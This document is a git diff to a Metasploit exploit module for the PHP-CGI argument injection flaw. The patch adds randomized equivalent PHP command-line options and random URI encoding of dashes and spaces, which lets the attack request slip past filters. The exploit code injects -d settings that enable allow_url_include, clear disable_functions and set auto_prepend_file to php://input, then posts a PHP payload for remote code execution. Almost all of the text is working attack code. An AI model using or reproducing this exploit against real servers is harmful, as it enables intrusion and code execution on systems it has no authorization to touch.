randomizes options from equivilants

modules/exploits/multi/http/php_cgi_arg_injection.rb

@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return Exploit::CheckCode::Unknown
 		end
 
-		response = send_request_raw({ 'uri' => uri + "?#{create_arg("s")}"})
+		response = send_request_raw({ 'uri' => uri + "?#{create_arg("-s")}"})
 		if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
 			return Exploit::CheckCode::Vulnerable
 		end
@@ -86,19 +86,21 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		begin
 			args = [
-				rand_spaces(datastore["URIENCODING"]),
+				rand_spaces(),
-				create_arg("d","allow_url_include=#{rand_php_ini_true}"),
+				create_arg("-d","allow_url_include=#{rand_php_ini_true}"),
-				create_arg("d","safe_mode=#{rand_php_ini_false}"),
+				create_arg("-d","safe_mode=#{rand_php_ini_false}"),
-				create_arg("d","suhosin.simulation=#{rand_php_ini_true}"),
+				create_arg("-d","suhosin.simulation=#{rand_php_ini_true}"),
-				create_arg("d",'disable_functions=""'),
+				create_arg("-d",'disable_functions=""'),
-				create_arg("d","open_basedir=none"),
+				create_arg("-d","open_basedir=none"),
-				create_arg("d","auto_prepend_file=php://input"),
+				create_arg("-d","auto_prepend_file=php://input"),
-				create_arg("n")
+				create_arg("-n")
 			]
 
 			qs = args.join()
 			uri = "#{target_uri}?#{qs}"
 			
+			#print_status("URI: #{target_uri}?#{qs}")      # Uncomment to preview URI
+			
 			# Has to be all on one line, so gsub out the comments and the newlines
 			payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
 			response = send_request_cgi( {
@@ -121,23 +123,51 @@ class Metasploit3 < Msf::Exploit::Remote
 	
 	def create_arg(arg, val = nil)
 		if val 
-			val = rand_encode(val, datastore["URIENCODING"]) #randomly URI encode characters in val
+			val = rand_encode(val) 
 			val.gsub!('=','%3d')   # = must always be encoded
 			val.gsub!('"','%2f')   # " too
 		end
 				
 		ret = ''
-		ret << "#{rand_spaces(datastore["URIENCODING"])}"
+		ret << "#{rand_spaces}"
-		ret << "#{rand_dash}"
+		ret << "#{rand_opt_equiv(arg)}"
-		ret << "#{arg}"
 		ret << "#{rand_space}"
-		ret << "#{rand_spaces(datastore["URIENCODING"]-1)}"
+		ret << "#{rand_spaces}"
 		ret << "#{val}"
 		ret << "#{rand_space}"
 	end
 	
+	def rand_opt_equiv(opt)
+		# Returns a random equivilant option from mapping at http://www.php.net/manual/en/features.commandline.options.php
+		opt_equivs = {
+			"-d" => [
+				"#{rand_dash}#{rand_encode("d")}", 
+				"#{rand_dash}#{rand_dash}#{rand_encode("define")}"
+				],
+			"-s" => [
+				"#{rand_dash}#{rand_encode("s")}", 
+				"#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlight")}", 
+				"#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlighting")}"
+				], 
+			"-T" => [
+				"#{rand_dash}#{rand_encode("T")}", 
+				"#{rand_dash}#{rand_dash}#{rand_encode("timing")}"
+				],
+			"-n" => [
+				"#{rand_dash}#{rand_encode("n")}", 
+				"#{rand_dash}#{rand_dash}#{rand_encode("no-php-ini")}"
+				]
+			}
+	
+		equivs = opt_equivs[opt]
+		equivs ? equivs[rand(opt_equivs[opt].length)] : opt	
+	
+	end
+	
 	def rand_encode(string, max = string.length)
+		# Randomly URI encode characters from string, up to max times.
 		chars = [];
+		if max > datastore["URIENCODING"] then max = datastore["URIENCODING"] end
 		if string.length == 1 
 			if rand(2) > 0
 				chars << 0
@@ -151,20 +181,20 @@ class Metasploit3 < Msf::Exploit::Remote
 		string
 	end
 	
-	def rand_spaces(x)
+	def rand_spaces(num = datastore["URIENCODING"])
 		ret = ''
-		   x.times {
+		   num.times {
 		   	ret << rand_space
 		   }
 		ret	   	
 	end
 	
 	def rand_space
-	  	["%20","%09","+"][rand(3)]
+	  	datastore["URIENCODING"] > 0 ? ["%20","%09","+"][rand(3)] : "+"
 	end
 	
 	def rand_dash
-		["-","%2d","%2D"][rand(3)]
+		datastore["URIENCODING"] > 0 ? ["-","%2d","%2D"][rand(3)] : "-"
 	end
 
 	def rand_php_ini_false